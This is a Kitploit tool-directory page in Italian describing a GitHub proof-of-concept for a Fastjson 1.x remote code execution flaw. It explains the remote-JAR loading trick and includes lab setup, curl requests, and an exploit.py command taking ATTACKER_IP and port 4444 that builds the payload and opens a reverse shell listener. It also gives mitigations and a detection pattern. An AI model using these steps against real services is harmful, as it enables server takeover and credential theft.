Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16723 — Proof-of-concept exploit per CVE-2026-16723, una vulnerabilità di esecuzione di codice in remoto in Fastjson 1.x tramite @JSONType, con un builder di JAR per il payload e un listener per reverse shell. | Kitploit
Strumenti/GitHubGitHub/yym8538/cve-2026-16723
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubyym8538/cve-2026-16723

CVE-2026-16723

Proof-of-concept exploit per CVE-2026-16723, una vulnerabilità di esecuzione di codice in remoto in Fastjson 1.x tramite @JSONType, con un builder di JAR per il payload e un listener per reverse shell.

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Panoramica

CVE-2026-16723 è una vulnerabilità di Remote Code Execution (RCE) in Fastjson 1.x (1.2.68 – 1.2.83). Quando Fastjson analizza JSON controllato dall'attaccante, un valore @type appositamente costruito viene trasformato in una ricerca di risorsa di classe all'interno di checkAutoType. In un fat-JAR eseguibile di Spring Boot il class loader risolve quel nome come URL jar:http:// e recupera un JAR remoto (SSRF), quindi carica una classe che porta l'annotazione @JSONType anche se AutoType è disabilitato. Poiché un JDK / Tomcat moderno rifiuta il nome binario jar:http://, la variante affidabile inserisce il JAR nella cache della JVM e lo rilegge tramite jar:file:/proc/self/fd/N, così la classe viene definita e il suo inizializzatore statico viene eseguito, consentendo l'esecuzione di codice. AutoType rimane disabilitato e non è richiesto alcun gadget nel classpath.


Versioni interessate

CategoriaVersione
VulnerabileFastjson 1.2.68 ≤ versione ≤ 1.2.83
CorrettaMigrare a Fastjson 2.x (nessuna release 1.x corretta)

Impatto

  • Remote Code Execution con l'account del servizio
  • Divulgazione di segreti / credenziali dall'host e dall'ambiente
  • Compromissione completa dell'applicazione interessata

Ambiente

Il target del laboratorio è una vetrina pubblica (Northwind Store) la cui API di ricerca associa il corpo della richiesta con Fastjson. Tutto è la configurazione predefinita di Fastjson: SafeMode off, AutoType off, pacchettizzato come fat-JAR di Spring Boot.

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
PrerequisitoStato in questo laboratorio
Fastjson 1.2.68 – 1.2.831.2.83
Fat-JAR eseguibile di Spring Bootsì
Percorso di parsing JSON non autenticatoPOST /api/products/search
SafeMode / AutoTypepredefinito (entrambi off)

PoC

L'attaccante e il target vengono eseguiti sulla stessa rete bridge di Docker, quindi il target raggiunge l'attaccante come connessione in uscita (non viene pubblicata alcuna porta aggiuntiva).

Passo 1. Confermare che il target sia attivo

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Passo 2. Eseguire l'exploit sulla macchina dell'attaccante

exploit.py costruisce il JAR del payload, lo serve, avvia un listener e stampa il corpo della richiesta. È richiesto solo l'indirizzo di callback.

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Passo 3. Consegnare il payload

Incollare il corpo stampato nell'endpoint di ricerca (Burp Repeater o curl) e inviarlo. La richiesta di ricerca è una funzionalità normale; solo il suo corpo JSON è costruito ad hoc.

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Passo 4. Confermare il risultato

Il codice viene eseguito con l'account del servizio. Recuperare la flag tramite la shell ottenuta:

whoami

Mitigazione

  • Migrare a Fastjson 2.x
  • Oppure eseguire com.alibaba:fastjson:1.2.83_noneautotype
  • Oppure avviare la JVM con -Dfastjson.parser.safeMode=true
  • Rilevamento: valori JSON @type contenenti pattern jar:http o jar:file / /proc/self/fd

Analisi

  • KR:
  • EN:
Scarica lo strumento